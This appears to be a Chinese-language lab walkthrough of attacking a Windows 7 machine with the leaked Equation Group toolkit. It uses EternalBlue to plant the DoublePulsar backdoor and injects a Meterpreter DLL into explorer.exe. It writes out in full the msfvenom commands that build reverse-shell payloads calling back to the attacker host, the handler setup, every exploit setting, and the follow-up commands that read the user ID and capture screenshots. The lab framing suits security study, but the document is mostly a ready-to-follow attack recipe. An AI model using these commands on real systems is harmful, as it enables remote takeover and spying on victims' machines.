攻击机:
Kali:192.168.1.103
Win2K3:192.168.1.109
靶机:
Win7(x86):192.168.1.108
1、在win2K3上要先装好Python运行环境:
安装Python-2.6.6.msi、pywin32-221.win32-py2.6.exe
2、现在kali上生成payload模块:
目标主机x86平台:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x86.dll
目标主机x64平台:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x64.dll
然后将payload文件拷贝到win2K3的C盘根目录下
3、打开msf
msfconsole
设置exploit模块
use exploit/multi/handler
set LHOST 192.168.1.103
set LPORT 5555
目标主机x86平台:
set PAYLOAD windows/meterpreter/reverse_tcp
目标主机x64平台:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
开始监听
exploit

4、在win2K3,打开方程式工具包,在Windows目录下

新建一个名为listeningposts的文件夹

否则程序会运行出错。
运行fb.py文件(以下是在特殊的地方设置,未做说明的地方回车选择默认设置)

由于win2k3安装在虚拟机,为了节省空间只设了一个C盘,所以日志位置设置在C盘

新建一个工程,name自定义

先用永恒之蓝在目标主机上安装后门

之后回车,target主机选择win72K8R2

Mode选择FB

之后回车默认选择,然后就在目标主机上安装了后门了

然后用怒怼模块

协议选择SMB

平台选择x86

攻击形式选择rundll

Payload选择刚才生成的x86.dll,填入路径

选择被注入的进程,在实验的时候如果选择默认的进程lsass.exe,在注入过程中会导致靶机重启,所以这里填入explorer.exe

然后回车、回车
直到注入成功

在kali上就可以看到回弹

getuid显示靶机ID:test-PC

screenshot截屏

存储在/root/XxmgVxIn.jpeg,就可以看到靶机的屏幕截图

浙公网安备 33010602011771号